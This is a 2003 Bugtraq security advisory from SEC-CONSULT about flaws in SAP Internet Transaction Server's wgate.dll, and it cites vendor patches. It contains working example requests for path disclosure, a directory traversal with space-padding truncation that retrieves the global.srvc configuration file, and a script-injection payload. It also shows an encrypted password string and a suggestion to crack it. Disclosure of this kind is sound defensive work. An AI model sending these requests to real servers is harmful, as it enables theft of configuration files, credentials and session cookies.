[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030830123242.426fd6ee.martin@websec.org>
Date: Sat, 30 Aug 2003 12:32:42 +0200
From: Martin Eiszner <martin@...sec.org>
To: bugtraq@...urityfocus.com
Subject: SAP Internet Transaction Server
To the List,
*******************************************************************************************
*******************************************************************************************
*******************************************************************************************
============================================================
SEC-CONSULT Security REPORT SAP Internet Transcaction Server
======================OOOOOOOOOOOO==========================
Product: ITS ITS, Version 4620.2.0.323011, Build 46B.323011 (win32/IIS 5.0)
Vulnerablities:
- Path/information disclosure
- Directory traversal
- Filename truncation
- Arbitrary file disclosure
- Cross site scripting/Cookie Theft
Vuln.-Classes: Check out http://www.owasp.org/asac/ for more detailed information on "Attack Components"
Vendor: SAP (http://www.sap.com/)
Vendor-Status: vendor contacted (02.08.2003)
Vendor-Patchs: SAP advice 598074,595383 and 654038
Object: wgate.dll
Exploitable:
Local: ---
Remote: YES
============
Introduction
============
Visit "http://www.sap.com" for additional information.
=====================
Vulnerability Details
=====================
1) DIRECTORY/INFO DISCLOSURE
============================
OBJECT:
wgate.dll (win32 CGI-Communication binary)
DESCRIPTION:
Insufficient input- and output validation on miscellaneous userinput allows the insertion of non existing values for the following user supplied paramters:
##################
~service
~templatelanguage
~language
~theme
~template
##################
Thus leading to several unwanted error messages which may include sensitive information on operating-system, software version a
nd the directory structure of the attacked server.
EXAMPLE:
---*---
Http-Request:
http://www.server.name/scripts/wgate/pbw2/!?
with params:
~runtimemode=DM&
~language=en&
~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&
---*---
REMARKS:
It might be possible that "~template" is an undocumented or forgotten variable (NOT confirmed).
2) ARBITRARY FILE DISCLOSURE (Directory Traversal / File Truncation)
====================================================================
OBJECT:
wgate.dll (win32 CGI-Communication binary)
DESCRIPTION:
EXAMPLE:
---*---
Http-Request:
http://www.server.name/scripts/wgate/pbw2/!?
with params:
~language=en&
~runtimemode=DM&
~templatelanguage=&
~language=en&
~theme=..\..&
~template=services\global.srvc++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++
---*---
(where "+" stands for spaces "%20" uri encoded).
Above will respond with the global server configuration file "global.srvc" on an ITS default-installation.
Normally the default-template extension (.html ?) gets concatenated to the rest of the template information.
Most probably somebody wanted to avoid a possible Bufferoverflow by truncating the input values if they exceed a given length.
Thus making it possible to shed the ".html" extension.
For some strange reason now and then the program responds with an error-message instead of giving out the requested file. This
might be due to unwanted?/additional? HTTP-Request-Header infos (NOT confirmed).
REMARKS:
The global configuration file "global.srvc" contains username and des-encrypted password
---*---
~password des26(2c94f116f4393f3d)
~login Master
---*---
A good DES-cracker should be able to crack this password-hash either by using wordlistst or by brute-force methods (NOT confirm
ed).
3) CROSS SITE SCRIPTING / COOKIE THEFT
======================================
OBJECT:
wgate.dll (win32 CGI-Communication binary)
DESCRIPTION:
Insufficient input- and output validation on miscellaneous userinput-parameters enables insertion of html/client side scripting
tags.
EXAMPLE:
---*---
Http-Request:
http://www.server.name/scripts/wgate.dll?
with params:
~service=--><img%09src=javascript:alert(1)%3bcrap
---*---
REMARKS:
Due to excessive usage of cookies for managing sessions and/or states cookie-theft is very likely.
There might be several other location where html/scripting tags can be inserted (NOT confirmed).
===============
GENERAL REMARKS
===============
Above findings derive from an external(black box) security test.
we would like to apologize in advance for potential nonconformities and/or known issues.
====================
Recommended Hotfixes
====================
Vendor-Patches: SAP advice 598074,595383 and 654038
EOF Martin Eiszner / @2003m.eiszner@...-consult.com
=======
Contact
=======
SEC-CONSULT
Austria / EUROPE
0043 699 12177237
m.eiszner@...-consult.com
http://www.sec-consult.com
*******************************************************************************************
*******************************************************************************************
*******************************************************************************************
--
Martin Eiszner / SEC-CONSULT
Austria / EUROPE
m.eiszner@...-consult.com
http://www.sec-consult.com
http://www.websec.org
tel: 0043 699 121772 37
Powered by blists - more mailing lists